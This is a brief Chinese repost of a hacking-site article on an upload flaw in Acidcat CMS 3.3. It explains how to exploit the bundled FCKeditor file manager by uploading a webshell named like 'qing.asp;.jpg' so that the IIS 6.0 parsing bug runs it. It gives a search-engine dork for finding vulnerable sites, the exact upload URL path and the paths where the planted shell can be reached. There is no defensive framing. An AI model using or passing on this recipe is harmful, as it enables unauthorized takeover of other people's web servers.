Acidcat CMS v 3.3 (fckeditor)上传漏洞

来源:百度文库 编辑:神马文学网 时间:2024/04/30 03:26:54
Acidcat CMS v 3.3使用 fckeditor编辑器,上传shell.asp;.jpg通过IIS6.0解析bug获取权限。google : Powered by Acidcat CMSEXP:
http://www.baoluowanxiang.com/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp上传图片解析马如:qing.asp;.jpgshell地址:
http://www.baoluowanxiang.com/read_write/file/qing.asp;.jpghttp://www.baoluowanxiang.com/public/File/qing.asp;.jpg
  本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处,侵权必究!
原文链接:http://www.baoluowanxiang.com/a/net-offense/loophole/2010/1124/2251.html